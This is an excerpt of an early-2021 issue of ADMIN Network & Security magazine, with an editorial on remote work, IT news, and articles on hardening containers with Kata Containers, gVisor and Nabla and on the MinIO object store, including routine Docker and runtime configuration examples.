ADMIN Network & Security
Issue 61, January-February 2021
WWW.ADMIN-MAGAZINE.COM

Lock Down: Secure containers with a hypervisor DMZ

FREE DVD: Clonezilla Live 2.7.0

Also in this issue:
• Cybersecurity: Machine learning defends the IT infrastructure
• 4 Password Managers
• Safe Containers: Automate updates of container components
• MinIO: Local object store with an S3 interface
• Pulumi: Multicloud orchestrator
• Tarpits: Slow down attackers
• Apache Kafka: Better stream processing
• New features in PHP 8
• Keycloak: In-house single sign-on server
• Teler: Analyze logs and identify suspicious activity in real time
• Managing Microsoft IIS
W E LCO M E

Upheaval
2021: The year of job and location change

Well, 2020 was certainly a wild ride, wasn't it? I hope you, your family, and your circle of friends are all safe, employed, and healthy. Even if you are employed, I'm predicting that 2021 will be a year of change for a lot of you and for myself. One significant thing that 2020 taught us is that we can work from anywhere. Remote work is possible and should be embraced as the next phase of system administration career mobility.

If you've worked as a system administrator for any length of time, you realize that a well-defined career ladder doesn't really exist. I hope that statement didn't come as a shocking surprise to you. Many of the sys admin jobs I've held over the past 20+ years don't even have a job description attached to them. I can't count the number of job descriptions I've written for myself and other sys admins, only to realize that it was a purely administrative effort. In other words, no one will ever read, refer to, or access the descriptions except to see that they exist. Such is the life of a sys admin. I don't mean to depress you or bemoan a good career choice. My purpose is to let you know that there is hope on the horizon.

Some of us have known for years that remote work is possible and that it's also a valuable asset for employers. Personally, I started working from home two days per week in 2001. My employer at the time insisted that we work remotely so that we could become more mobile and so that the company could possibly downsize its real estate footprint. It worked. Some companies still haven't caught on to the 20-year-old trend of remote work.

The biggest problem with remote work is discipline. Some people don't have the discipline to do it well. It takes getting used to. Really, the only differences between remote work and going to an office are the commute and your proximity to other people. I find little value in either. I love working at home, from a hotel room, or from the comfort of a rented condo at the beach. I'm not sure there's any real advantage to going into an office on a regular basis. Let me put it plainly: If your employer doesn't see the value of remote work and you have the technology to allow it, then you should seek employment elsewhere. That's what I did. My previous employer didn't want anyone in IT to work remotely, even though we had the capability. I got busy and found an employer that operates in the 21st century.

I've heard all the arguments on both sides of the topic, and none convince me that going into an office should be a requirement for those of us who (1) don't need to interact directly with other people (users or customers), (2) are just as efficient from a remote location, and (3) work hours outside of 8:00am to 5:00pm. I like to work remotely. I have fewer distractions at home, which I understand is not the case for everyone, but it works for me. I also don't always want to work regular office hours. My most efficient work times are early in the morning and then in the evenings. I still log more than the customary eight hours per day, so my employer should never feel slighted or overcharged. For me, remote work is the best benefit I could request, and it's the most valued of any perk I've received.

Frankly, I stayed at one job for 16 years because of a remote work option. When they brought us back into an office, I found a different job – one that was remote friendly. My next job was not remote friendly. I didn't stay long. I'm now at a very remote-friendly company, and I'm happy. I'm also relocating to the East Coast from the Midwest, which also makes me happy.

I suggest that you evaluate what you want from your career and your life. If physical mobility is what you're after, then find a position that allows it. If career mobility is your goal, you might have to reconsider your selection of a job in IT. For me, 2021 is going to be a year of transitions – transitions away from things, people, and places that I don't like to those I do.

Ken Hess • ADMIN Senior Editor

S E RV I C E Table of Contents

ADMIN Network & Security

Features
Security is the watchword this issue, and we begin with eliminating container security concerns.
10 Container Security with a DMZ – Container technology security is not well defined. We look at several approaches to closing this security gap with hypervisors and buffer zones.

News
Find out about the latest ploys and toys in the world of information technology.
8 News
• Native edge computing comes to Red Hat Enterprise Linux
• IBM/Red Hat deals crushing blow to CentOS
• Linux Kernel 5.10 is ready for release
• Canonical launches curated container images

Tools
Save time and simplify your workday with these useful tools for real-world systems administration.
16 MinIO – This fast high-performance object storage server has a world-class S3 interface, with features even the original lacks.
22 OpenIAM – Identity and access management plays a central role in modern IT infrastructures. Discover how OpenIAM implements centralized user management.
26 PHP 8 – Version 8 of the popular PHP scripting language comes with a number of innovations and ditches some obsolete features.
30 Timeout in a Tarpit – Consume an attacker's resources or direct them to a throttled SSH server. Keep an attacker's connections open in an Endlessh "tarpit" or delay incoming connections with the rate-limiting tc.
34 Apache Kafka – Apache Kafka continuously captures, processes, stores, and integrates data, almost in real time.

Containers and Virtualization
Virtual environments are becoming faster, more secure, and easier to set up and use. Check out these tools.
42 Pulumi – A unified interface and surface for orchestrating various clouds and Kubernetes.
48 Build Secure Containers – The basic container images on which you base your work can often be out of date. We show you how to solve this problem and create significantly leaner containers.

Security
Use these powerful security tools to protect your network and keep intruders in the cold.
52 Secure Login with FIDO2 – The FIDO and FIDO2 standards support passwordless authentication.
58 Cybersecurity and ML – Machine learning can address risks and help defend the IT infrastructure by strengthening and simplifying cybersecurity. Deep learning excels at feature extraction, which makes machine learning algorithms interesting for cybersecurity tasks.
64 Keycloak – Run an on-premises single sign-on service with the option of integrating existing Kerberos or LDAP accounts.

Management
Use these practical apps to extend, simplify, and automate routine admin tasks.
66 Auto Install with PXE – Automate CentOS and RHEL installation in a preboot execution environment.
72 Teler – This intrusion detection and threat alert tool analyzes logs and identifies suspicious activity in real time.

Nuts and Bolts
Timely tutorials on fundamental techniques for systems administrators.
76 Password Managers – Four password managers that can help you keep track of all your access credentials.
84 Parallel Performance – Why the wall clock time of your parallelized applications does not improve when you add cores.
88 Managing Microsoft IIS – Manage Microsoft IIS with on-board tools, including the well-known Internet Information Services (IIS) Manager, Windows Admin Center, and PowerShell.

Service
3 Welcome
4 Table of Contents
6 On the DVD
94 Performance Tuning Dojo – We examine some mathemagical tools that approximate time-to-execute given the parallelizable segment of code.
97 Back Issues
98 Call for Papers

On the DVD: Clonezilla Live 2.7.0 – supports many filesystems, MBR and GPT partition formats, unattended mode, restoring one image to many local devices, and eCryptfs. See p. 6 for details.
S E RV I C E On the DVD

Clonezilla 2.7.0-10 (Live)

Clonezilla is a partition and disk imaging/cloning program suitable for single-machine backup and restore. The Linux kernel has been updated to 5.9.1-1. Clonezilla Live supports:
• Many filesystems
• MBR and GPT partition formats
• Unattended mode
• Restoring one image to many local devices
• eCryptfs

Resources
[1] Clonezilla: https://clonezilla.org
[2] About: https://clonezilla.org/clonezilla-live.php
[3] 2.7.0-10 release: https://sourceforge.net/p/clonezilla/news/
[4] FAQs: https://drbl.org/faq/
[5] Downloads: https://clonezilla.org/downloads/download.php?branch=stable

DEFECTIVE DVD? Defective discs will be replaced; email [email protected]. While this ADMIN magazine disc has been tested and is to the best of our knowledge free of malicious software and defects, ADMIN magazine cannot be held responsible and is not liable for any disruption, loss, or damage to data and computer systems related to the use of this disc.
NEWS ADMIN News

News for Admins
Native Edge Computing Comes to Red Hat Enterprise Linux
With the latest release of Red Hat Enterprise Linux (RHEL) and OpenShift, it has become even
easier for businesses to add edge deployment to existing infrastructure.
With this release, Red Hat has attempted to refine the definitions of edge computing. On this point, Nicolas Barcet, Red Hat Senior Director of Technology Strategy, says, "Edge is not just one thing, it's multiple things, multiple layers." Barcet continues, "A single customer use case may have up to five layers of edge-related infrastructure, going from the IoT device all the way to the aggregation data centers." He concludes, "What we need to offer as a software infrastructure provider is all the components to build according to the topology that the customer wants for that use case."
To address those components, Red Hat identified three basic edge architectures:

• Far edge – single server locations with limited connectivity
• Closer edge – factory, branch, or remote store with reliable connectivity and multiple servers
• Central edge – a regional data center that can control far and closer edge infrastructures

RHEL 8.3 (released in November) includes tools like Image Builder to address building custom images (based on RHEL) for the Far Edge, worker nodes for the Closer Edge, and OpenShift with an added management layer for the Central Edge. But the most important feature found in RHEL 8.3 is the Red Hat Advanced Cluster Management tool, which provides the ability to manage a fleet of OpenShift clusters.
For more information about RHEL 8.3, read the official release notes (https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/index).

IBM/Red Hat Deals Crushing Blow to CentOS


In a move that can be best summed up with a gaping mouth, IBM/Red Hat has announced it is ending CentOS 8 and shifting all releases of the server operating system to the Stream edition.
What is CentOS Stream, you ask? It's a rolling release edition of the popular server platform. What is a rolling release? Instead of the traditional yearly major and minor releases, rolling releases are continuously updated, so all software (from the kernel to the userspace software) is always up to date.
For many, this means instability can be introduced to the system. For an operating system known for its rock-solid stability, the shift to a rolling release could mean disaster.
But it's not just the update process that has many a Linux admin up in arms. To date, CentOS has been downstream of RHEL, which meant it included most of the features added to the enterprise-grade operating system. CentOS Stream, however, will be downstream of Fedora, so it will not benefit from anything added to RHEL.
CentOS 8 admins will have until some point in 2021 to decide if they want to continue on with CentOS Stream or find another platform.
To read more on this, check out Red Hat's official take on the shift (https://www.redhat.com/en/blog/centos-stream-building-innovative-future-enterprise-linux).

Get the latest IT and HPC news in your inbox: Subscribe free to ADMIN Update and HPC Update at bit.ly/HPC-ADMIN-Update.

Linux Kernel 5.10 Is Ready for Release


For a while, Linus Torvalds was concerned about the size of changes for the Linux 5.10 release.
However, with the release of the rc6 candidate, that worry has subsided. To this point, Torvalds
said, “...at least this week isn’t unusually bigger than normal – it’s a pretty
normal rc6 stat-wise. So unless we have some big surprising left-overs
coming up, I think we’re in good shape.”
Torvalds continued to say, “That vidtv driver shows up very clearly in the
patch stats too, but other than that it all looks very normal: mostly driver
updates (even ignoring the vidtv ones), with the usual smattering of small
fixes elsewhere – architecture code, networking, some filesystem stuff."
As far as what’s to be expected in the kernel, there are two issues that
have been around for some time that are finally being either given the boot
or improved.
The first is the removal of the set_fs() feature, which checks whether a copy of the user space actually goes to either the user space or to the kernel. Back in 2010, it was discovered that this feature could be used to overwrite and give permission to arbitrary kernel memory allocations. The bug was fixed, but the feature remained. Since then, however, manufacturers have improved the management of memory so that, on most architectures, memory space overloads have been banned.
Another improvement is the continued work to address the 2038 issue (a bug that has been known for some time regarding time encoding). On POSIX systems, time is calculated based on seconds elapsed since January 1, 1970. As more time passes, the number needed to represent a date increases. By the year 2038, it is believed 32-bit systems will no longer function. As of the 5.6 release, those systems could pass the year 2038. The 5.10 release improves on that reliability.
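You can make the rollover point concrete yourself: A signed 32-bit time_t tops out at 2,147,483,647 seconds after the epoch. A quick check with GNU date (output format may differ slightly on your system) shows exactly where that lands:

$ date -u -d @2147483647
Tue Jan 19 03:14:07 UTC 2038
$ date -u -d @2147483648    # one second later no longer fits in a signed 32-bit time_t

On a 64-bit system the second command simply prints the next second; on an unpatched 32-bit system, that value wraps around, which is the bug the kernel work addresses.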
Released in mid-December 2020, Linux Kernel 5.10 offers filesystem and storage optimiza-
tions, as well as support for even more hardware.
For more information on the release, check out this message (https://lwn.net/Articles/838514/) from
Linus himself.

Canonical Launches Curated Container Images


Any admin who has deployed containers understands how important security is for business. The
problem with containers is that it’s often hard to know if an image is safe to use, especially when
you’re pulling random images from the likes of Docker Hub. You never know if you’re going to pull
down an image that contains vulnerabilities or malware.
That’s why Canonical has decided to publish the long-term support (LTS) Docker Image Portfolio
to Docker Hub. This portfolio comes with up to 10 years of Extended Security Maintenance from
Canonical. In response, Mark Lewis, Canonical VP of Application Services, has stated, “LTS Images
are built on trusted infrastructure, in a secure environment, with guarantees of stable security up-
dates.” Lewis continued, “They offer a new level of container provenance and assurance to organi-
zations making the shift to container based operations.”
This means that Canonical has joined Docker Hub as a Docker Verified Publisher to ensure that
hardened Ubuntu images will be available for software supply chains and multicloud development.
For anyone looking to download images, they can be viewed on the official Ubuntu Docker page
(https://hub.docker.com/_/ubuntu) or pulled with a command like docker pull ubuntu.
For more information about this joint venture, check out the official Docker announcement
(https://www.docker.com/blog/canonical-joins-docker-verified-publisher-program/).

F E AT U R E S Container Security with a DMZ

Secure containers with a hypervisor DMZ

Buffer Zone

Container technology security is not well defined. We look at several approaches to closing this security gap with hypervisors and buffer zones. By Udo Seidel

Containers have become an almost omnipresent component in modern IT. The associated ecosystem is growing and making both application and integration ever easier. For some, containers are the next evolutionary step in virtual machines: They launch faster, are more flexible, and make better use of available resources.
One question remains unanswered: Are containers as secure as virtual machines? In this article, I first briefly describe the current status quo. Afterward, I provide insight into different approaches to eliminating security concerns. The considerations are limited to Linux as the underlying operating system, but this is not a real restriction, because the container ecosystem on Linux is more diverse than on its competitors.

How Secure?

Only the specifics of container security are investigated here. Exploiting an SQL vulnerability in a database or a vulnerability in a web server is not considered. Classic virtual machines serve as the measure of all things. The question is: Do containers offer the same kind of security? More precisely: Do containers offer comparable or even superior isolation of individual instances from each other? How vulnerable is the host to attack by the services running on it?
A short review of the basic functionality of containers is essential (Figure 1). Control groups and namespaces provided by the operating system kernel serve as fundamental components, along with some processes and access permissions assigned by the kernel. One major security challenge with containers immediately becomes apparent: A user who manages to break out of an instance goes directly to the operating system kernel – or at least dangerously close to it. The villain is thus in an environment that has comprehensive, far-reaching rights. Additionally, one kernel usually serves several container instances. In case of a successful attack, everyone is at risk.

Figure 1: Simplified schematic structure of containers.
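To make the namespace building block concrete, you can create an isolated PID namespace by hand with the unshare tool from util-linux – a minimal illustration of the kernel mechanism, not one of the approaches discussed in this article:

# Start a shell in its own PID namespace with a private /proc;
# inside, the shell sees itself as PID 1 and no host processes.
$ sudo unshare --pid --fork --mount-proc sh -c 'ps ax'
  PID TTY      STAT   TIME COMMAND
    1 pts/0    S+     0:00 sh -c ps ax
    2 pts/0    R+     0:00 ps ax

A container runtime combines several such namespaces with control groups and capability restrictions, but everything still runs on the one shared kernel – which is exactly the attack surface the buffer-zone approaches below try to insulate.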
The obvious countermeasure is to prevent such an outbreak, but that is easier said than done. The year 2019 alone saw two serious security vulnerabilities [1] [2]. Fortunately, this was not the case in 2020. However, this tranquility might be deceptive: The operating system kernel is a complex construct with many system calls and internal communication channels. Experience shows that undesirable side effects or even errors occur time and again. Sometimes these remain undiscovered for years. Is there no way to improve container security? Is trusting the hard work of the developer community the only way?

New Approach: Buffer Zone

The scenario just described is based on a certain assumption or way of thinking: It is important to prevent breakouts from the container instance, although this is only one possible aspect of container security. Avoiding breakouts protects the underlying operating system kernel. Is there another way to achieve this? Is it possibly okay just to mitigate the damage after such a breakout?
This approach is not at all new in IT. One well-known example comes from the field of networks, when securing a website with an application and database. A buffer zone, known as the demilitarized zone (DMZ) [3], has long been established here. The strategy can also be applied to containers (Figure 2). In the three following approaches for this buffer zone, the essential difference is how "thick" or "extensive" it is.

Figure 2: A buffer zone secures the containers.

Kata Containers

The first approach borrows heavily from classical virtualization with a hypervisor. One prominent representative is the Kata Containers [4] project, which has been active since 2017. Its sponsor is the Open Infrastructure Foundation, which many probably still know as the OpenStack Foundation [5]. However, the roots of Kata Containers go back further than 2017, and the project brings together efforts from Intel and the Hyper.sh secure container hosting service: Clear Containers [6] or runV [7].
Kata Containers use a type II hypervisor with a lean Linux as the buffer zone (Figure 3). In the first versions, a somewhat leaner version of Qemu [8] was used; newer versions support the Firecracker [9] microhypervisor by AWS.
When this article was written, the Kata Containers project had just released a new version that reduced the number of components needed. In Figure 3, you can see a proxy process, which is completely missing from the current version. Moreover, only a single shim process is now running for all container instances.
The real highlight, however, is not the use of Qemu and the like, but integration with container management tools. In other words: Starting, interacting with, and stopping container instances should work like conventional containers. The Kata approach uses two processes for this purpose.
The first, Kata Shim, is an extension of the standardized shim into the container world. It is the part of the bridge that reaches into the virtual machine. There, process number two, the Kata agent, takes over, running as a normal process within the virtual instance. In the standard installation, this role is handled by a lean operating system by Intel named Clear Linux [10], which gives the kernel of the underlying operating system double protection: through the kernel of the guest operating system and through the virtualization layer.
Another benefit is great compatibility. In principle, any application that can be virtualized should work; the same can be said for existing container images. There were no surprises in the laboratory tests. The use of known technologies also facilitates problem analysis and troubleshooting.

Figure 3: The schematic structure of Kata Containers.

Hypervisor Buffer Disadvantages

Increased security with extensive compatibility also comes at a price. On the one hand is the heavier demand on hardware resources: A virtualization process has to run for each container instance. On the other hand, the underlying software requires maintenance and provides an additional attack vector, which is why Kata Containers relies on a slimmed-down version of Qemu. Speaking of maintenance, the guest operating system also has to be up to date. At the very least, critical bugs and vulnerabilities need to be addressed.
All in all, increased container security results in a larger attack surface on the host side and a significant increase in administrative overhead. To alleviate this problem, you could switch to microhypervisors, but again the question of compatibility arises. Ultimately, your decision should depend on the implementation of the microhypervisor. To gain practical experience, you can run Kata Containers with the Firecracker virtual machine manager (Listing 1) [11].

Listing 1: Kata and Firecracker

$ docker run --runtime=kata-fc -itd --name=kata-fc busybox sh
d78bde26f1d2c5dfc147cbb0489a54cf2e85094735f0f04cdf3ecba4826de8c9
$ pstree|grep -e container -e kata
|-containerd-+-containerd-shim-+-firecracker---2*[{firecracker}]
|            |                 |-kata-shim---7*[{kata-shim}]
|            |                 `-10*[{containerd-shim}]
|            `-14*[{containerd}]
$
$ docker exec -it kata-fc sh
/ #
/ # uname -r
5.4.32
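How does Docker know about the kata-fc runtime used in Listing 1? As with any alternative OCI runtime, it has to be registered with the Docker daemon. The following sketch shows the idea; the binary path and configuration file location are assumptions that depend on how your distribution packages Kata Containers, so check the Kata documentation for the exact values:

$ cat /etc/docker/daemon.json
{
    "runtimes": {
        "kata-fc": {
            "path": "/usr/bin/kata-runtime",
            "runtimeArgs": [
                "--kata-config",
                "/usr/share/defaults/kata-containers/configuration-fc.toml"
            ]
        }
    }
}
$ sudo systemctl restart docker

After the restart, docker run --runtime=kata-fc launches each container inside its own Firecracker microVM, exactly as demonstrated in Listing 1.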
Behind the Scenes

An installation of Kata Containers comprises a number of components that can be roughly divided into two classes. First are the processes that run on the host system, such as Kata Shim and the Kata hypervisor. In older versions, a proxy was added. Second are processes that run inside Kata Containers, starting with the operating system within the hypervisor and extending to the Kata agent and the application. In extreme cases, the user is thus confronted with more than a handful of components that need to be kept up to date and secure.
However, the typical application does not provide for more than three parts. The processes and development cycles for the host operating system and the application are independent of Kata Containers. The remaining components can be managed as a complete construct. In other words, popular Linux distributions come with software directories that support easy installation, updating, and removal of components, including the hypervisor, the guest core, the entire guest operating system, Kata Shim, and the Kata agent. By the way, containers can easily be operated Kata-style parallel to conventional containers.

Double Kernel Without Virtualization

As already mentioned, the hypervisor approach just described has two isolation layers – the guest operating system or its kernel and the virtualization itself. The question arises as to whether this could be simplified. How about using only one additional kernel as a buffer zone? Good idea, but how do you start a Linux kernel on one that is already running?
If you've been around in the IT world for a few years, you're probably familiar with user-mode Linux (UML) [12]. The necessary adjustments have been part of the kernel for years, but initial research shows that this project is pretty much in a niche of its own – not a good starting position to enrich the container world.
A second consideration might take you to the kexec() system call. Its typical field of application is collecting data that has led to a failure of the primary Linux kernel, and it has very little to do with executing containers, which run several times, at the same time, and for far longer.
Whether UML or kexec() – without extensive additional work – these projects cannot be used for increased container security.

gVisor

Google has implemented in the gVisor [13] project a watered-down variant of starting a second kernel. Two major challenges arise in establishing an additional operating system kernel as a buffer zone. The first is running one or even multiple additional kernels. The second relates to transparent integration into the existing world of tools and methods for container management.
The gVisor project, written in the fairly modern Go programming language, provides a pretty pragmatic solution for these tasks. The software only pretends to be a genuine Linux kernel. The result is a normal executable file that maps all the necessary functions of the operating system kernel; the challenge of how to load, or of multiple execution, is therefore off the table.
Imitating a Linux kernel is certainly difficult, but not impossible. To minimize the additional attack surface, the range of functions can be reduced accordingly – "only" containers have to run. The gVisor kernel comprises two components (Figure 4): Sentry mimics the Linux substructure and intercepts the corresponding system calls, and Gofer controls access to the host system's volumes.
Attentive readers might wonder what exactly in this strategy might not work, and things did get off to a bit of a bumpy start. Fans of the Postgres database had some worries because of a lack of support for the sync_file_range() system call [14]. By now, this is ancient history. Even inexperienced programmers can get an overview of the supported system calls in the gvisor/pkg/sentry/syscalls/linux/linux64.go file, but you do not have to go into so much detail: The developer website supplies a compatibility list [15].
Gofer acts as a kind of proxy and interacts with the other gVisor component, Sentry. If you want to know more about it, you have to take a look at a fairly ancient protocol – 9P [16] – that has its origins in the late 1980s in the legendary Bell Labs.

Figure 4: The schematic structure of gVisor.

Shoulder Surfing gVisor

If you compare Kata Containers and gVisor, the latter looks simpler. Instead of multiple software components, you only need to manage a single executable file. The area of attack from additional components on the overall system is also smaller. On the downside, compatibility requires additional overhead. Without any personal effort, users are dependent on the work and commitment of the gVisor developers.

Secure Containers with gVisor

The first steps with gVisor are easy: You only have to download and install a single binary file. One typical pitfall (besides unsupported system calls) is allowing for the version of the gVisor kernel, version 4.4.0 by default. In the world of open source software, however, this is often little more than a string – as it is here (Listing 2). The version number is stored in the gvisor/pkg/sentry/syscalls/linux/linux64.go file. Creating a customized binary file is easy thanks to container technology. Listing 2 also shows how gVisor can be installed and operated in parallel with other runtime environments. You only need to specify the path to the binary file and any necessary arguments.

Listing 2: gVisor Kernel Buffer Zone

$ cat /etc/docker/daemon.json
{
    "runtimes": {
        "oci": {
            "path": "/usr/sbin/runc"
        },
        "runsc": {
            "path": "/usr/local/bin/runsc",
            "runtimeArgs": [
                "--platform=ptrace",
                "--strace"
            ]
        }
    }
}

$ uname -r
5.8.16-300.fc33.x86_64
$ docker run -ti --runtime runsc busybox sh
/ #
/ # uname -r
4.4.0
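Getting the runsc binary referenced in Listing 2 onto the host might look like the following sketch. The download URL follows the release scheme documented on the gVisor website at the time of writing; treat it as an assumption and check the current installation instructions:

# Fetch the statically linked runsc binary and put it on the PATH
# (URL pattern as documented by the gVisor project; verify before use)
$ wget https://storage.googleapis.com/gvisor/releases/release/latest/x86_64/runsc
$ chmod +x runsc
$ sudo mv runsc /usr/local/bin/
$ runsc --version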
Minimalists

Finally, a third approach adopts the ideas of the first two and pushes minimalism to the extreme. Again, a kind of microhypervisor takes over the service, in addition to a superminimalistic operating system kernel, which is an old acquaintance from the family of unikernels.
Unikernels have very different implementations. For example, OSv [17] still maintains a certain Linux compatibility, although parallels to the gVisor kernel presented here can be seen. At the other end of the reusability spectrum is MirageOS, the (traditional) godfather of Nabla containers [18]: Here you build the application and kernel completely from scratch, and both are completely matched to each other. As a result, you only have one executable file. In other words, the application is the kernel and vice versa. One layer below this is the microhypervisor, which specializes in the execution of unikernels. It has little in common with its colleagues Firecracker, Nova [19], or Bareflank [20].
One implementation of this approach is Nabla containers. The roots of the project lie in the IBM research laboratories. Solo5 is used as the microhypervisor. Originally it was only intended as an extension of MirageOS for KVM [21]. Today, it is a framework for executing various unikernel implementations. Despite the proximity to MirageOS, Nabla containers have developed a certain preference for rump kernels [22].
The schematic structure is shown in Figure 5. The name "Nabla" derives from its structure. At the top is the microhypervisor with the unikernel, the basis of which is the application. The size of the components reflects their importance on the business end, and the order corresponds to the structure of the technology stack. The result is an upside-down triangle that is very similar to the nabla symbol from vector analysis.

Figure 5: The schematic structure of Nabla containers.

A few advantages of Nabla containers are obvious: As with the Kata approach, the operating system core and virtualization present two isolation layers that are greatly minimized and require significantly less in terms of resources than the combination of Clear Linux and Qemu Lite. Additionally, almost all system calls are prohibited in Nabla containers. The software uses the kernel's secure computing mode (seccomp) functions [23]. Ultimately, the following system calls are available (a generic seccomp sketch follows the list):
• read()
• write()
• exit_group()
• clock_gettime()
• ppoll()
• pwrite64()
• pread64()
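To illustrate what such a whitelist means in practice – this is a generic illustration of the seccomp mechanism, not Nabla's actual profile – you can hand Docker a profile that rejects everything except a short list of system calls:

$ cat minimal.json
{
    "defaultAction": "SCMP_ACT_ERRNO",
    "syscalls": [
        {
            "names": ["read", "write", "exit_group", "clock_gettime",
                      "ppoll", "pwrite64", "pread64"],
            "action": "SCMP_ACT_ALLOW"
        }
    ]
}
$ docker run --security-opt seccomp=minimal.json busybox true

Note that an ordinary Linux program needs far more calls (execve(), mmap(), and friends) just to start, so a list this short only works when application and kernel are built as one unit – precisely the unikernel trick Nabla exploits.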

On the downside, unlike Kata Containers or gVisor, existing container images cannot be used directly with the Nabla approach, revealing a clear lack of compatibility. Tests conducted by the editorial team showed that the migration overhead is huge, even for small applications.

Where to Next?

The container community takes the issue of security very seriously. In principle, there are two parallel streams: One deals with improving the container software, and the other, as discussed in this article, deals with methods for establishing additional outside lines of defense. The idea of using a DMZ from the network sector is experiencing a renaissance. An additional operating system kernel – and sometimes even a virtualization layer – acts as a buffer zone between the application and the host.
Basic compatibility with the known management tools for containers is a given; they can even be operated completely in parallel (see also Listing 2). However, the reusability of existing applications and container images differs widely. Kata Containers put fewer obstacles in the user's way. At the other end of the spectrum are Nabla containers. Either way, the idea of the buffer zone is as simple as it is brilliant. Thanks to the different implementations, there should be something to suit everyone's taste.

Info
[1] Container breakout: http://seclists.org/oss-sec/2019/q1/119
[2] Docker vulnerability: https://nvd.nist.gov/vuln/detail/CVE-2018-15664
[3] DMZ: https://en.wikipedia.org/wiki/DMZ_(computing)
[4] Kata Containers: http://katacontainers.io
[5] OpenStack: http://www.openstack.org/
[6] Clear Containers: http://github.com/clearcontainers/runtime/wiki
[7] runV: http://github.com/hyperhq/runv
[8] Qemu: http://www.qemu.org/
[9] Firecracker: http://firecracker-microvm.github.io/
[10] Clear Linux: http://clearlinux.org/
[11] Kata Containers with Firecracker: http://github.com/kata-containers/documentation/wiki/Initial-release-of-Kata-Containers-with-Firecracker-support
[12] User-mode Linux: http://user-mode-linux.sourceforge.net/
[13] gVisor: http://gvisor.dev/
[14] gVisor problems: http://github.com/google/gvisor/issues/88
[15] Compatibility list: http://gvisor.dev/docs/user_guide/compatibility/
[16] 9P: http://9p.cat-v.org/
[17] OSv: http://osv.io/
[18] Nabla containers: http://nabla-containers.github.io/
[19] Nova: http://hypervisor.org/
[20] Bareflank: http://github.com/Bareflank/MicroV
[21] KVM: http://linux-kvm.org/
[22] Rump kernels: http://rumpkernel.org/
[23] seccomp: http://man7.org/linux/man-pages/man2/seccomp.2.html

The Author
Udo Seidel is a math physics teacher and has been a Linux fan since 1996. After completing his PhD, he worked as a Linux/Unix trainer, system administrator, senior solution engineer, and Linux strategist. Today he is employed as an IT architect and evangelist by Amadeus Data Processing GmbH in Erding, Germany.
TO O L S MinIO

MinIO: Amazon S3 competition

Premium Storage

MinIO promises no less than a local object store with a world-class S3 interface and features that even the original lacks. By Martin Loschwitz

The Amazon Simple Storage Service (S3) protocol has had astonishing development in recent years. Originally, Amazon regarded the tool merely as a means to store arbitrary files online with a standardized protocol, but today, S3 plays an important role in the Amazon tool world as a central service. Little wonder that many look-alikes have cropped up. Ceph, the free object store, for example, has offered a free alternative for years by way of the Ceph Object Gateway, which can handle both the OpenStack Swift protocol and Amazon S3.
MinIO is now following suit: It promises a local S3 instance that is largely compatible with the Amazon S3 implementation. MinIO even claims to offer functions that are not found in the original. The provider, MinIO Inc. [1], is not sparing when it comes to eloquent statements, such as "world-leading," or even "industry standard." Moreover, it's completely open source, which is reason enough to investigate the product. How does it work under the hood? What functions does it offer? How does it position itself compared with similar solutions? What does Amazon have to say?

How MinIO Works

MinIO is available under the free Apache license. You can download the product directly from the vendor's GitHub directory [2]. MinIO is written entirely in Go, which keeps the number of dependencies to be resolved to a minimum.
MinIO Inc. itself also offers several other options to help admins install MinIO on their systems [3]. The ready-to-use Docker container, for example, is particularly practical for getting started in very little time. However, if you want to do without containers, you will also find an installation script on the provider's website that downloads and launches the required programs.
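For a first test, the container route really is a matter of minutes. The following sketch assumes the minio/minio image on Docker Hub and the credential variables MinIO used at the time of writing; the data path and credentials are placeholders, so check the download page [3] for the current invocation:

# Launch a single-node MinIO server; the S3 API listens on port 9000
$ docker run -d -p 9000:9000 \
    -e MINIO_ACCESS_KEY=admin \
    -e MINIO_SECRET_KEY=password123 \
    -v /srv/minio-data:/data \
    minio/minio server /data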

What looks simple and clear-cut from the outside comprises several layers under the hood. You can't see them because MinIO comes as a single big Go binary, but it makes sense to dig down into the individual layers.

Three Layers

Internally, MinIO is defined as an arbitrary number of nodes with MinIO services that are divided into three layers. The lowest layer is the storage layer. Even an object store needs access to physical disk space. Of course, MinIO needs block storage devices for its data, and it is the admin's job to provide them. Like other solutions (e.g., Ceph), MinIO takes care of its redundancy setup itself (Figure 1).
The object store is based on the storage layer. MinIO views every file uploaded to the store as a binary object. Incoming binary objects, either from the client side or from other MinIO instances of the same cluster, first end up in a cache. In the cache, a decision is made as to what happens to the objects. MinIO passes them on to the storage layer in either compressed or encrypted form.

Figure 1: The MinIO architecture is distributed and implicitly redundant. It also supports encryption at rest. ©MinIO [4]
Implicit Redundancy

Redundancy at the object store level is a good thing these days in a distributed solution like MinIO; hard drives are by far the most fragile components in IT. SSDs are hardly better: Contrary to popular opinion, they break down more often than hard drives, but at least they do it more predictably.
To manage dying block storage devices, MinIO implements internal replication between instances of a MinIO installation. The object layers speak their own protocol via a RESTful API. Notably, MinIO uses erasure coding instead of the classic one-to-one replication used by Ceph.
This coding has advantages and disadvantages: The disk space required for replicas of an object in one-to-one replication is dictated by the object size. If you operate a cluster with a total of three replicas, each object exists three times, and the net capacity of the system is reduced by two thirds. This principle of operation has basically remained the same since RAID1, even with only one copy of the data.
Erasure coding works differently: It distributes parity data of individual block devices across all other block devices. The devices do not contain the complete binary objects, but the objects can be calculated from the parity data at any time, reducing the amount of storage space required in the system. For every 100TB of user data, almost 40TB of parity data is required, whereas 300TB of disk space would be needed for classic full replication.
On the other side of the coin, when resynchronization becomes necessary (i.e., if single block storage devices or whole nodes fail), considerable computational effort is needed to restore the objects from the parity data. Whereas objects are only copied back and forth during resyncing in the classic full replication, the individual MinIO nodes need a while to catch up with erasure coding. If you use MinIO, make sure you use correspondingly powerful CPUs for the environment.
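Erasure coding kicks in automatically as soon as you hand the server several drives or nodes. A minimal sketch, assuming four local disks mounted under /mnt (the paths and hostnames are placeholders; MinIO's ellipsis notation expands the pattern, and the default parity settings split the drives into data and parity shares):

# Single node, four drives: MinIO stripes objects plus parity across them
$ minio server /mnt/disk{1...4}

# Distributed: the same pattern works across hosts
$ minio server https://minio{1...4}.example.com/mnt/disk{1...4}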
Eradicating Bit Rot

MinIO comes with a built-in data integrity checking mechanism. While the cluster is in use, the software checks the integrity of all stored objects transparently and in the background for both users and administrators. If the software detects that an object stored somewhere – for whatever reason – is no longer in its original state, it starts to resynchronize from another source in the cluster where the object is undamaged.

Cross-Site Replication

The software also uses its capabilities to replicate data to another location. Whereas object stores like Ceph do not support complete mirroring for various reasons, MinIO officially supports this use case with the corresponding functions built in; external additional components are not required.
